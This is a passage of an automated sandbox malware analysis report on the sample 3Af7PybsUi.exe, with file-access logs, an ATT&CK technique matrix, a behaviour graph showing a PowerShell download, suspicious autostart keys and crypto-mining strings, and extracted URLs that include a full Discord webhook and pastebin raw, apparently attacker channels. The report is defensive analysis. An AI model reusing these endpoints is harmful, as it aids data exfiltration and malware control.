Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{0A1148D0-6B5F-43A6-B19B-31E0405F20B5}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeQueries volume information: C:\Users\user\AppData\Local\Temp\{3924CCB2-4D94-4EC4-A7EF-4C83FEEBF7C7}\.ba\SideBar.png VolumeInformation
Source: C:\Windows\System32\SrTasks.exeQueries volume information: C:\ VolumeInformation
Source: C:\Program Files\Python311\python.exeQueries volume information: C:\Program Files\Python311 VolumeInformation
Source: C:\Program Files\Python311\python.exeQueries volume information: C:\Program Files\Python311\DLLs VolumeInformation
Source: C:\Program Files\Python311\python.exeQueries volume information: C:\Program Files\Python311\DLLs VolumeInformation
Source: C:\Program Files\Python311\python.exeQueries volume information: C:\Program Files\Python311\DLLs VolumeInformation
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_00494F5A ConvertStringSecurityDescriptorToSecurityDescriptorW,GetLastError,CreateNamedPipeW,GetLastError,CreateNamedPipeW,GetLastError,CloseHandle,LocalFree,23_2_00494F5A
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF72629C330 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF72629C330
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_0048623E GetUserNameW,GetLastError,23_2_0048623E
Source: C:\Users\user\Desktop\3Af7PybsUi.exeCode function: 0_2_00007FF7262B4F10 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF7262B4F10
Source: C:\Users\user\AppData\Local\Package Cache\{7f8381ad-2e42-4432-8de5-c7beebe1009f}\python-3.11.0-amd64.exeCode function: 23_2_0048520D GetModuleHandleW,CoInitializeEx,GetVersionExW,GetLastError,CoUninitialize,23_2_0048520D
Source: C:\Windows\Temp\{32AE44B6-4843-42E0-AC9F-223BDA72F352}\.be\python-3.11.0-amd64.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire Infrastructure1
Replication Through Removable Media
11
Windows Management Instrumentation
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
OS Credential Dumping12
System Time Discovery
Remote Services1
Archive Collected Data
1
Ingress Tool Transfer
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
Native API
22
Windows Service
1
Access Token Manipulation
2
Obfuscated Files or Information
LSASS Memory11
Peripheral Device Discovery
Remote Desktop ProtocolData from Removable Media21
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts13
Command and Scripting Interpreter
121
Registry Run Keys / Startup Folder
22
Windows Service
1
Timestomp
Security Account Manager1
Account Discovery
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal Accounts1
Service Execution
Login Hook12
Process Injection
1
DLL Side-Loading
NTDS3
File and Directory Discovery
Distributed Component Object ModelInput Capture13
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud Accounts2
PowerShell
Network Logon Script121
Registry Run Keys / Startup Folder
1
File Deletion
LSA Secrets37
System Information Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts23
Masquerading
Cached Domain Credentials1
Query Registry
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items41
Virtualization/Sandbox Evasion
DCSync41
Security Software Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
Access Token Manipulation
Proc Filesystem1
Process Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow41
Virtualization/Sandbox Evasion
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
Application Window Discovery
Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
System Owner/User Discovery
Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1532956 Sample: 3Af7PybsUi.exe Startdate: 14/10/2024 Architecture: WINDOWS Score: 72 97 www.python.org 2->97 99 dualstack.python.map.fastly.net 2->99 105 Multi AV Scanner detection for submitted file 2->105 107 Sigma detected: Suspicious Invoke-WebRequest Execution 2->107 109 Sigma detected: Suspicious Script Execution From Temp Folder 2->109 10 msiexec.exe 2->10         started        13 3Af7PybsUi.exe 104 2->13         started        16 python-3.11.0-amd64.exe 2->16         started        18 5 other processes 2->18 signatures3 process4 dnsIp5 81 C:\Program Files\...\win_add2path.py, Python 10->81 dropped 83 C:\Program Files\Python311\Tools\...\which.py, Python 10->83 dropped 85 C:\...\verify_ensurepip_wheels.py, Python 10->85 dropped 93 348 other files (none is malicious) 10->93 dropped 21 msiexec.exe 10->21         started        87 C:\Users\user\AppData\...\win32trace.pyd, PE32+ 13->87 dropped 89 C:\Users\user\AppData\...\win32crypt.pyd, PE32+ 13->89 dropped 91 C:\Users\user\AppData\Local\...\win32api.pyd, PE32+ 13->91 dropped 95 72 other files (none is malicious) 13->95 dropped 119 Suspicious powershell command line found 13->119 23 3Af7PybsUi.exe 4 13->23         started        26 python-3.11.0-amd64.exe 16->26         started        101 127.0.0.1 unknown unknown 18->101 28 python-3.11.0-amd64.exe 18->28         started        30 conhost.exe 18->30         started        32 conhost.exe 18->32         started        file6 signatures7 process8 signatures9 34 python.exe 21->34         started        113 Suspicious powershell command line found 23->113 115 Found strings related to Crypto-Mining 23->115 36 tmpaf99aaqq.exe 3 23->36         started        39 powershell.exe 14 17 23->39         started        43 SrTasks.exe 23->43         started        45 python-3.11.0-amd64.exe 26->45         started        47 python-3.11.0-amd64.exe 28->47         started        process10 dnsIp11 49 conhost.exe 34->49         started        71 C:\Windows\Temp\...\tmpaf99aaqq.exe, PE32 36->71 dropped 51 tmpaf99aaqq.exe 27 33 36->51         started        103 dualstack.python.map.fastly.net 151.101.0.223, 443, 49715 FASTLYUS United States 39->103 73 C:\Users\user\AppData\...\tmpaf99aaqq.exe, PE32 39->73 dropped 117 Powershell drops PE file 39->117 55 conhost.exe 39->55         started        57 conhost.exe 43->57         started        75 C:\Users\user~1\...\DEL54BE.tmp (copy), PE32 45->75 dropped 77 C:\Users\user\AppData\Local\...\PythonBA.dll, PE32 45->77 dropped 59 python-3.11.0-amd64.exe 45->59         started        79 C:\Users\user\AppData\Local\...\PythonBA.dll, PE32 47->79 dropped 61 python-3.11.0-amd64.exe 47->61         started        file12 signatures13 process14 file15 65 C:\Windows\Temp\...\python-3.11.0-amd64.exe, PE32 51->65 dropped 67 C:\Windows\Temp\...\PythonBA.dll, PE32 51->67 dropped 69 C:\Users\user\...\python-3.11.0-amd64.exe, PE32 51->69 dropped 111 Creates autostart registry keys with suspicious names 51->111 63 python-3.11.0-amd64.exe 9 23 51->63         started        signatures16 process17

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
3Af7PybsUi.exe25%ReversingLabs
3Af7PybsUi.exe36%VirustotalBrowse
SourceDetectionScannerLabelLink
3bf77a.rbf (copy)0%ReversingLabs
3bf79c.rbf (copy)0%ReversingLabs
3bf79d.rbf (copy)0%ReversingLabs
3bf79f.rbf (copy)0%ReversingLabs
3bf7a0.rbf (copy)0%ReversingLabs
3bf7a1.rbf (copy)0%ReversingLabs
3bf7a2.rbf (copy)0%ReversingLabs
3bf7a3.rbf (copy)0%ReversingLabs
3bf7a4.rbf (copy)0%ReversingLabs
3bf7a5.rbf (copy)0%ReversingLabs
3bf7a8.rbf (copy)0%ReversingLabs
3bf7a9.rbf (copy)0%ReversingLabs
3bf7aa.rbf (copy)0%ReversingLabs
3bf7ab.rbf (copy)0%ReversingLabs
3bf7ac.rbf (copy)0%ReversingLabs
3bf7ad.rbf (copy)0%ReversingLabs
3bf7ae.rbf (copy)0%ReversingLabs
3bf7af.rbf (copy)0%ReversingLabs
3bf7b0.rbf (copy)0%ReversingLabs
3bf7b1.rbf (copy)0%ReversingLabs
3bf7b2.rbf (copy)0%ReversingLabs
3bf7b3.rbf (copy)0%ReversingLabs
No Antivirus matches
SourceDetectionScannerLabelLink
dualstack.python.map.fastly.net0%VirustotalBrowse
www.python.org0%VirustotalBrowse
SourceDetectionScannerLabelLink
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
https://api.ipify.org0%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
https://www.python.org/ftp/python/3.11.0/amd64/lib_pdb.msi0%VirustotalBrowse
http://wixtoolset.org/schemas/thmutil/20100%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/dev_d.msis0%VirustotalBrowse
https://github.com/mhammond/pywin320%VirustotalBrowse
https://pastebin.com/raw1%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/lib_pdb.msid0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/test_d.msiX0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/test_d.msiN0%VirustotalBrowse
http://docs.python.org/library/unittest.html0%VirustotalBrowse
https://github.com/pypa/packaging0%VirustotalBrowse
https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr=0%VirustotalBrowse
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base640%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/test_d.msih0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/exe_d.msid0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/lib_pdb.msiA0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/exe_d.msiu0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/tcltk_d.msi.0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/exe_d.msiS0%VirustotalBrowse
https://setuptools.pypa.io/en/latest/pkg_resources.html#basic-resource-access0%VirustotalBrowse
https://www.youtube.com/watch?v=QB7ACr7pUuE0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/test_d.msi0%VirustotalBrowse
http://appsyndication.org/2006/appsynapplicationc:0%VirustotalBrowse
http://www.apache.org/licenses/LICENSE-2.0.html0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/dev_d.msiA0%VirustotalBrowse
https://github.com/python/cpython/issues/86361.0%VirustotalBrowse
https://discord.com/api/webhooks/1266714407531057152/kGUAi8nU7KWK3s1rHPYHNujlEgOGwUolVWZOn2iBZWohl2W0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msiU0%VirustotalBrowse
https://www-cs-faculty.stanford.edu/~knuth/fasc2a.ps.gz0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/core_d.msid0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/test_pdb.msiX0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/ucrt.msiy~0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/dev_d.msiP0%VirustotalBrowse
https://www.python.org/ftp/python/3.11.0/amd64/lib_d.msib~1%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
dualstack.python.map.fastly.net
151.101.0.223
truefalseunknown
www.python.org
unknown
unknowntrueunknown
NameSourceMaliciousAntivirus DetectionReputation
https://www.python.org/ftp/python/3.11.0/amd64/lib_pdb.msitmpaf99aaqq.exe, 00000008.00000003.1852201281.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000008.00000003.1852071828.00000000005C0000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000002.2135710147.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2130908241.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133299039.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2125700452.0000000003B4B000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2120636048.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2133558161.00000000013B1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2124870266.0000000003B4C000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119494105.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000017.00000003.2119794834.00000000013B0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2198030648.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2201291201.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2132930857.00000000013F1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2200451190.00000000013F1000.00000004.00000020.00020000.00000000.sdmpfalseunknown
https://www.python.org/ftp/python/3.11.0/amd64/lib_pdb.msib~python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpfalse
    unknown
    https://www.python.org/ftp/python/3.11.0/amd64/test_d.msiNtmpaf99aaqq.exe, 00000009.00000003.1858307189.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1856495603.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855497238.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854580162.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1854387653.00000000006A2000.00000004.00000020.00020000.00000000.sdmp, tmpaf99aaqq.exe, 00000009.00000003.1855216740.00000000006A1000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2380771165.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2378303173.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2221803838.0000000000FC9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    http://wixtoolset.org/schemas/thmutil/2010tmpaf99aaqq.exe, 00000009.00000003.1858874692.0000000002B8F000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000019.00000003.2204657211.00000000036FF000.00000004.00000800.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001C.00000003.2334469546.0000000002C0F000.00000004.00000800.00020000.00000000.sdmpfalseunknown
    https://www.python.org/ftp/python/3.11.0/amd64/dev_d.msispython-3.11.0-amd64.exe, 0000001A.00000003.2201234395.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001A.00000003.2217240497.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001A.00000003.2200793133.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001A.00000003.2218089967.0000000000F31000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001A.00000003.2202426903.0000000000F31000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://github.com/mhammond/pywin323Af7PybsUi.exe, 00000000.00000003.1315602967.000002643EF75000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000000.00000002.2235597551.000002643EF82000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://pastebin.com/raw3Af7PybsUi.exe, 00000003.00000003.1855816456.000001EC89935000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856655752.000001EC89996000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855667301.000001EC898D2000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1854485559.000001EC896F1000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855155972.000001EC8981B000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856013049.000001EC899D0000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1856940856.000001EC899AA000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855919539.000001EC89970000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855535432.000001EC89895000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1362365322.000001EC89B35000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1855365547.000001EC89858000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://www.python.org/ftp/python/3.11.0/amd64/lib_pdb.msidpython-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2380771165.0000000000FC8000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2378303173.0000000000FC9000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2221803838.0000000000FC9000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://www.python.org/ftp/python/3.11.0/amd64/test_d.msiXpython-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    http://docs.python.org/library/unittest.html3Af7PybsUi.exe, 00000003.00000003.1867200804.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353135872.000001EC836DD000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353956388.000001EC836DD000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://www.python.org/ftp/python/3.11.0/amd64/exe_d.msiupython-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base643Af7PybsUi.exe, 00000003.00000003.1346710386.000001EC8320E000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1343896449.000001EC8320E000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1344920702.000001EC8320E000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://github.com/pypa/packaging3Af7PybsUi.exe, 00000003.00000003.1343724398.000001EC834C5000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://www.python.org/ftp/python/3.11.0/amd64/test_d.msihpython-3.11.0-amd64.exe, 00000018.00000003.2122476748.00000000009DB000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 00000018.00000003.2121692854.00000000009DB000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://setuptools.pypa.io/en/latest/references/keywords.html#keyword-namespace-packagesr=3Af7PybsUi.exe, 00000003.00000003.1353065738.000001EC84164000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1353094622.000001EC837E7000.00000004.00000020.00020000.00000000.sdmp, 3Af7PybsUi.exe, 00000003.00000003.1352551050.000001EC837A0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://www.python.org/ftp/python/3.11.0/amd64/exe_d.msidpython-3.11.0-amd64.exe, 0000001F.00000003.2650221167.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000001F.00000003.2222164091.0000000000FC0000.00000004.00000020.00020000.00000000.sdmpfalseunknown
    https://www.python.org/ftp/python/3.11.0/amd64/tcltk_pdb.msic~python-3.11.0-amd64.exe, 0000000A.00000003.2040728322.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867440823.0000000000C60000.00000004.00000020.00020000.00000000.sdmp, python-3.11.0-amd64.exe, 0000000A.00000003.1867675839.0000000000C60000.00000004.00000020.00020000.00000000.sdmpfalse
      unknown
